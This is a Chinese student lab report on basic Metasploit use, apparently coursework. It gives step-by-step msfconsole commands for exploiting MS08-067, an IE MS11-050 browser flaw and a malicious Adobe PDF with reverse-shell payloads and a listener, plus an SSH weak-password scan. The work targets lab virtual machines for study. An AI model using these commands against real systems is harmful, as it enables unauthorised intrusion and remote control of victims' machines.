《网络攻防》 MSF基础应用
20145224陈颢文 《网络攻防》MSF基础应用
基础问题回答
用自己的话解释什么是exploit,payload,encode:
- exploit:攻击手段,是能使攻击武器(payload)的方法;
- payload:攻击武器,真正具有攻击性的代码;
- encode:编码方式,根据payload将要被放置的环境选择合适的编码方式,使它能够正常的运行,如:消除所有的“0x00”;
实验总结与体会
这次实验做的我好心累,也好欣慰,心累是因为想要成功的做出实验实在是太困难了,有个好靶机是关键;欣慰是感觉到我们正在使用的系统也并没有之前想象中的那么不堪,只要及时打补丁,还是能防住不少“小毛贼”的。
实践过程记录
MS08_067漏洞渗透攻击(主动攻击)
- 使用
winXPenSP3
为靶机; - 首先得确保两台机子在同一网段内,如果不在就手动修改;
- 终端中打开
msfconsole
,输入命令use exploit/windows/smb/ms08_067_netapi
,使用MS08_067漏洞模块; - 使用命令
set payload generic/shell_reverse_tcp
指定攻击有效载荷; - 设置具体参数:
set LHOST Kali的IP
和set RHOST Windows的IP
; show options
查看所有参数是否设置正确,最后下令发起攻击exploit
:
MS11050安全漏洞(IE浏览器渗透攻击)
- 使用
免考xp sp3
为靶机; - 首先得确保两台机子在同一网段内,如果不在就手动修改;
- 终端中打开
msfconsole
,输入命令use windows/browser/ms11_050_mshtml_cobjectelement
,使用MS11050漏洞模块; - 使用命令
set payload windows/meterpreter/reverse_tcp
指定攻击有效载荷; - 设置具体参数:
set LHOST Kali的IP
、set LPORT 自定义端口号
和set URIPATH 自定义域名
; show options
查看所有参数是否设置正确,最后下令发起攻击exploit
:
- 复制
local IP
,在靶机上使用IE浏览器进行访问:
成功是成功了,但是结果和我预想的不太一样?!
我猜啊,也许是我Kali的版本不一样,所以payload
的功能也不同了~
Adobe阅读器渗透攻击(针对客户端)
- 使用
winxpAttaker
为靶机; - 首先得确保两台机子在同一网段内,如果不在就手动修改;
- 终端中打开
msfconsole
,输入命令use exploit/windows/fileformat/adobe_cooltype_sing
,使用Adobe阅读器漏洞模块; - 使用命令
set payload windows/meterpreter/reverse_tcp
指定攻击有效载荷; - 设置具体参数:
set FILENAME 自定义文件名.pdf
、set LHOST Kali的IP
和set LPORT 自定义端口号
; show options
查看所有参数是否设置正确,最后输入exploit
,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里;
什么?!粘贴不上去!!!那就快去把靶机里的虚拟机增强工具更新一下吧,别告诉我你不会!- 使用
back
指令返回上一级菜单,再设置msf的监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 主机IP
set LPORT 端口号
show options(检查所有数据是否正确)
exploit
- 最后在靶机中打开刚刚的PDF文件即可(时间略长);
成功应用任何一个辅助模块
- 显示所有的辅助模块
show auxiliary
(甚用,谁试谁知道); - 通过上面三个实验不难看出msf的使用还是有套路可循的:
进入模块
->指定荷载
->设置参数
->发动攻击
; - 这次我尝试使用的是一个扫描SSH弱口令的一个辅助工具
ssh_login
,模块路径:auxiliary/scanner/ssh/ssh_login; - 终端中打开
msfconsole
,输入命令use auxiliary/scanner/ssh/ssh_login
,使用ssh_login模块; - 使用
show options
查看所有参数,其中Required
一栏中为“yes”的是必填参数,理论上把他们填好了这个模块也就能正常的使用了:
show options
查看所有参数是否设置正确,最后输入exploit
开始扫描:
成功登陆到一个用户名为“root”、密码为“123456”的SSH账户!
转载于:https://www.cnblogs.com/20145224kevs/p/6690495.html
《网络攻防》 MSF基础应用相关推荐
- [网络安全自学篇] 十四.Python攻防之基础常识、正则表达式、Web编程和套接字通信(一)
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步.前文分享了Wireshark抓包原理知识,并结合NetworkMiner工具抓取了 ...
- 2018-2019-2 20165212《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165212<网络攻防技术>Exp5 MSF基础应用 攻击成果 主动攻击的实践 ms17010eternalblue payload windows/x64/m ...
- 2018-2019-2 20165332《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165332<网络攻防技术>Exp5 MSF基础应用 1.基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是 ...
- 2017-2018-2 20155314《网络对抗技术》Exp5 MSF基础应用
2017-2018-2 20155314<网络对抗技术>Exp5 MSF基础应用 目录 实验内容 实验环境 基础问题回答 预备知识 实验步骤--基于Armitage的MSF自动化漏洞攻击实 ...
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 20155227《网络对抗》Exp5 MSF基础应用
20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...
- 20155235 《网络攻防》 实验八 Web基础
20155235 <网络攻防> 实验八 Web基础 实验内容 Web前端HTML(0.5分) 能正常安装.启停Apache.理解HTML,理解表单,理解GET与POST方法,编写一个含有表 ...
- 20145335郝昊《网络攻防》Bof逆向基础——ShellCode注入与执行
20145335郝昊<网络攻防>Bof逆向基础--ShellCode注入与执行 实验原理 关于ShellCode:ShellCode是一段代码,作为数据发送给受攻击服务器,是溢出程序和蠕虫 ...
- 2018-2019-2 20165234 《网络对抗技术》 Exp5 MSF基础应用
实验五 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.一个主动攻击实践,ms08_067(成功) 2. 一个针对浏览器 ...
最新文章
- 【Qt】QCloseEvent的使用小结
- 干货|NLP 的四张技术路线图,带你系统设计学习路径
- 《Programming Ruby 中文版第二版》P577页singleton_method_undefined方法说明有点问题
- 10月网民上网高峰时段为晚上8点 比例升至6.64%
- 吴恩达机器学习Ex3作业
- what is the location of js when using run as server in Eclipse
- Java扩展机制可加载所有JAR
- Android中打包含有Activity以及资源文件的jar包在工程中调用
- 【NIPS 2017】基于深度强化学习的想象力增强智能体
- 802.11ax速览
- 520超浪漫文艺表白,追求女神必备!!动态Html网页,无编程基础也可娱乐
- ImageJ 插入插件和基本教程
- (三)基于Phyphox的三线摆法测量物体转动惯量
- 机器学习之理解支持向量机SVM
- 牛客网刷题:Q3禁忌雷炎(一般)
- php excel水印图片大小,PHPExcel:如何在第一页标题中插入图像并将其放大以适合其内容?...
- 决策树模型——鸢尾花分类
- Matplotlib——饼图pie()函数
- php imap 安装_php怎么安装imap扩展
- 手写数字识别的实现(案例)
热门文章
- 小方块上升组成背景特效 html+css+js
- 居民身份证阅读器产品开发学习心得(再谈标准-软件-协议)
- 凡人修c传(四)翻牌子(POJ - 3279 - Fliptile每日一水)
- 【转】企业微信自动打卡设置
- Anaconda入门:安装及包与环境的管理(conda命令)
- 基于pwntools和seccomp-tools的awd pwn通防小工具
- python 动图处理_python图像处理-gif动图
- OPC 、OPC DA、OPC UA介绍
- Dev-C++下面的编译状态栏信息不显示
- 【Java进阶营】什么是真正的架构设计?某厂十年Java经验让我总结出了这些,不愧是我